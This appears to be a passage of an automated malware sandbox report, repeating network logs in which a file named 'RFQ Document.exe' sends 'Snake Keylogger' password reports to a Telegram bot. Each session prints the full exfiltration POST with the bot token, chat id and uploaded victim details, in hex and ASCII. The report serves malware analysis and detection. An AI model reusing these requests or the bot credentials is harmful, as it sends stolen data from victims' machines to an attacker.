                                            Data Ascii: {"ok":true,"result":{"message_id":12786,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            197192.168.2.450018149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:15 UTC315OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e299a6d4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:15 UTC315OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 39 39 61 36 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e299a6d4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:15 UTC316INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:15 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:15 UTC316INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12787,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            198192.168.2.450019149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:15 UTC316OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e2af1b82
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:15 UTC317OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 61 66 31 62 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e2af1b82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:15 UTC317INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:15 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:15 UTC318INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12788,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            199192.168.2.450020149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:15 UTC318OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e2c6f1b5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:15 UTC318OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 63 36 66 31 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e2c6f1b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:16 UTC319INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:16 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:16 UTC319INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12789,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.449776149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:21 UTC2OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c2167f0d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:21 UTC3OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 31 36 37 66 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c2167f0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:21 UTC3INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:21 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:21 UTC3INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12581,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            20192.168.2.449794149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:24 UTC31OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c433b23d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:24 UTC32OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 33 33 62 32 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c433b23dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:24 UTC32INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:24 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:24 UTC32INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12600,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            200192.168.2.450021149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:16 UTC320OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e2e6b551
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:16 UTC320OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 65 36 62 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e2e6b551Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:16 UTC320INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:16 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:16 UTC321INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12790,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            201192.168.2.450022149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:16 UTC321OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e304f2cb
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:16 UTC322OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 30 34 66 32 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e304f2cbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:16 UTC322INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:16 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:16 UTC322INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12791,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            202192.168.2.450023149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:16 UTC323OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e31a64b4
                                            Host: api.telegram.org
                                            Content-Length: 407
